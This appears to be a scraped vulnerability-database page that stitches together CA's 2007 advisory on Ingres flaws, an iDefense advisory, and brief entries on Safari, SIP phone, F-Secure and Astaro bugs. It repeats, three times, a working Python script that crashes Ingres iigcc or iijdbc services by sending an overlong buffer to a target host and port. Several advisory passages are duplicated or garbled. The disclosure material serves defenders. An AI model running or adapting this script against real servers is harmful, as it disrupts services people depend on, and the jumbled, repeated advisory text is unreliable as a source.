Impact: Attackers can potentially execute arbitrary code, or
overwrite files. CA has issued fixes, to address all of
these vulnerabilities, for all supported CA products that may be
affected.
1) Ingres controllable pointer overwrite vulnerability (reported
by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]
Description: An unauthenticated attacker can potentially execute
arbitrary code within the context of the database server.
3) Ingres wakeup file overwrite (reported by NGSSoftware)
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named
"alarmwkp.def" in the current directory, truncating the file if it
already exists. The "wakeup" binary is setuid "ingres" and
world-executable. Consequently, an attacker can truncate a file
with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to
uuid_from_char() to cause a stack buffer overflow and the saved
returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the
Ingres verifydb utility duve_get_args function.
6) Communication server heap corruption (reported by iDefense)
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the
context of the communications server (iigcc.exe). This only
affects Ingres on the Windows operating system. Reported by
iDefense as IDEF2023.
7) Data Access/JDBC server heap corruption (reported by iDefense)
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the
context of the Data Access server (iigcd.exe) in r3 or the JDCB
server in older releases. This only affects Ingres on the Windows
operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High
risk rating.
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix,
Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform
r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11,
r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA
products that embed Ingres. This includes Windows, Linux, and
supported UNIX platforms.
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed
on the Security Notice page:
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting:
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory:
http://www.ngssoftware.com/research/advisories/
iDefense Advisory:
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory,
please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a
Vulnerability" form.
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
if service == "iigcc":
payload = "\x41" * 2106
elif service == "iijdbc":
payload = "\x41" * 1066
else:
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
print service + " crashed"
VAR-200706-0397 | CVE-2007-3336 |
CA Used in products Ingres database server Vulnerable to arbitrary code execution
Related entries in the VARIoT exploits database: VAR-E-200706-0107 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple "pointer overwrite" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed
Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or
overwrite files. CA has issued fixes, to address all of
these vulnerabilities, for all supported CA products that may be
affected.
3) Ingres wakeup file overwrite (reported by NGSSoftware)
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named
"alarmwkp.def" in the current directory, truncating the file if it
already exists. The "wakeup" binary is setuid "ingres" and
world-executable. Consequently, an attacker can truncate a file
with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to
uuid_from_char() to cause a stack buffer overflow and the saved
returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the
Ingres verifydb utility duve_get_args function.
6) Communication server heap corruption (reported by iDefense)
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the
context of the communications server (iigcc.exe). This only
affects Ingres on the Windows operating system. Reported by
iDefense as IDEF2023.
7) Data Access/JDBC server heap corruption (reported by iDefense)
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the
context of the Data Access server (iigcd.exe) in r3 or the JDCB
server in older releases. This only affects Ingres on the Windows
operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High
risk rating.
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix,
Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform
r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11,
r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA
products that embed Ingres. This includes Windows, Linux, and
supported UNIX platforms.
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed
on the Security Notice page:
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting:
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory:
http://www.ngssoftware.com/research/advisories/
iDefense Advisory:
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory,
please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a
Vulnerability" form.
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
if service == "iigcc":
payload = "\x41" * 2106
elif service == "iijdbc":
payload = "\x41" * 1066
else:
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
print service + " crashed"
VAR-200706-0395 | CVE-2007-3334 |
eTrust Secure Content Manager including CA Used in products Ingres Database Server For Communications Server Heap-based buffer overflow vulnerability in components
Related entries in the VARIoT exploits database: VAR-E-200706-0107 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
3) Ingres wakeup file overwrite (reported by NGSSoftware)
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named
"alarmwkp.def" in the current directory, truncating the file if it
already exists. The "wakeup" binary is setuid "ingres" and
world-executable. Consequently, an attacker can truncate a file
with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to
uuid_from_char() to cause a stack buffer overflow and the saved
returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the
Ingres verifydb utility duve_get_args function. This only
affects Ingres on the Windows operating system. Reported by
iDefense as IDEF2023. This only affects Ingres on the Windows
operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High
risk rating.
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix,
Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform
r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11,
r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA
products that embed Ingres. This includes Windows, Linux, and
supported UNIX platforms.
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed
on the Security Notice page:
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting:
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory:
http://www.ngssoftware.com/research/advisories/
iDefense Advisory:
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory,
please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a
Vulnerability" form.
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities
iDefense Security Advisory 06.21.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 21, 2007
I. BACKGROUND
Ingres is the database backend used by default in several CA products.
The SCM (Secure Content Manager) is one of the products that uses
Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP
requests/replies. For more information visit the following URLs.
http://www3.ca.com/solutions/Product.aspx?ID=1013
http://www.ingres.com/
II. The Communications
Server is the main component responsible for receiving and handling
requests from the network. The Data Access Server is responsible for
handling requests from the Ingres JDBC Driver and .NET data providers.
These requests are decoded into Ingres internal formats and passed on
to other components of the database server.
The application does not properly validate the length of attacker
supplied data before copying it into a fixed size heap buffer. This
leads to an exploitable condition.
III. ANALYSIS
Exploitation allows an unauthenticated attacker to execute arbitrary
code with SYSTEM privileges.
In order to exploit this vulnerability an attacker would have to send a
malformed request to the database server. This requires the ability to
establish a TCP session on port 10916 (iigcc) or 10923 (iigcd).
Exploitation has been demonstrated to be trivial.
IV. Previous versions may also be affected. In addition, any
application that uses the Ingres Database may be vulnerable.
V. WORKAROUND
Employing firewalls or other access control methods can effectively
reduce exposure to this vulnerability.
VI. VENDOR RESPONSE
CA has made fixes available for all supported CA products that embed
Ingres. For more information consult CA's Security Alert at the
following URL.
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3334 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
01/16/2007 Initial vendor notification
01/17/2007 Initial vendor response
06/21/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
if service == "iigcc":
payload = "\x41" * 2106
elif service == "iijdbc":
payload = "\x41" * 1066
else:
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
print service + " crashed"
VAR-200706-0410 | CVE-2007-3349 | Aastra 9112i SIP Phone SIP Message Denial Of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Aastra 9112i SIP Phone with firmware 1.4.0.1048 and boot version 1.1.0.10 allows remote attackers to (1) cause a denial of service (device freeze) via a malformed SIP message of a certain length or (2) cause a denial of service (continuous ring) via a malformed SIP message of a certain other length. Aastra 9112i IP phone is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP messages.
An attacker can exploit this issue to crash the affected device, denying service to legitimate users.
This issue affects firmware 1.4.0.1048, boot version: 1.1.0.10
VAR-200706-0449 | CVE-2007-3300 | plural F-Secure Vulnerabilities that prevent scanning of anti-virus products |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive.
An attacker may exploit this issue by sending maliciously crafted RAR or LHA archives to victims.
Successful exploits will allow attackers to distribute compressed archives containing malicious code that will not be detected by the antivirus application. Both F-Secure Internet Gatekeeper and F-Secure Anti-Virus are anti-virus products released by an anti-virus software manufacturer in Finland
VAR-200706-0523 | CVE-2007-3274 | Apple Safari Service disruption in ( Application crash ) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Apple Safari 3.0 and 3.0.1 on Windows XP SP2 allows attackers to cause a denial of service (application crash) via JavaScript that sets the document.location variable, as demonstrated by an empty value of document.location. Safari is prone to a denial-of-service vulnerability. The JavaScript can set the document.location variable, such as an empty value for document.location
VAR-200706-0412 | CVE-2007-3351 | SJPhone SIP Phone Invite Transaction Denial Of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The SJPhone SIP soft phone 1.60.303c, when installed on the Dell Axim X3 running Windows Mobile 2003, allows remote attackers to cause a denial of service (device hang and traffic amplification) via a direct crafted INVITE transaction, which causes the phone to transmit many RTP packets. The SJPhone SIP phone is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP messages.
An attacker can exploit this issue to crash the affected device, denying service to legitimate users. This transaction will cause the phone to send many RTP packets
VAR-200706-0533 | CVE-2007-3284 | Apple Safari for Windows Corefoundation.DLL Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
corefoundation.dll in Apple Safari 3.0.1 (552.12.2) for Windows allows remote attackers to cause a denial of service (crash) via certain forms that trigger errors related to History, possibly involving multiple form fields with the same name. Apple Safari for Windows is prone to a denial-of-service vulnerability because it fails to properly handle user-supplied input.
An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Attackers may also be able to execute arbitrary code, but Symantec had not confirmed this.
Safari 3.0.1 public beta for Windows is reported vulnerable
VAR-200706-0180 | CVE-2007-3253 | ASG Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Multiple unspecified vulnerabilities in Astaro Security Gateway (ASG) before 7.005 allow remote attackers to cause a denial of service via (1) certain email, which stops the SMTP Proxy during scanning; (2) certain HTTP traffic, which stops or slows down the HTTP proxy during HTTP responses containing virus scanned web pages; and (3) a disconnection during a streaming session. Astaro Security Gateway (ASG) There is a service disruption (DoS) Vulnerabilities exist.Service disruption by a third party via: (DoS) There is a possibility that. Astaro Up2Date is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
An attacker can exploit this issue to cause the application to stop responding, denying further service to legitimate users.
This issue affects versions prior to Astaro Up2Date 7.005. Multiple unidentified vulnerabilities exist in Astaro Security Gateway (ASG)
VAR-200706-0346 | CVE-2007-2398 | Apple Safari of Windows Vulnerability that changes the contents of the window title and address bar when used on Windows |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Apple Safari 3.0.1 beta (522.12.12) on Windows allows remote attackers to modify the window title and address bar while filling the main window with arbitrary content by setting the location bar and using setTimeout() to create an event that modifies the window content, which could facilitate phishing attacks.
Attackers may exploit this vulnerability via a malicious webpage to spoof the contents and origin of a page that the victim may trust. Attackers may find this issue useful in phishing or other attacks that rely on content spoofing.
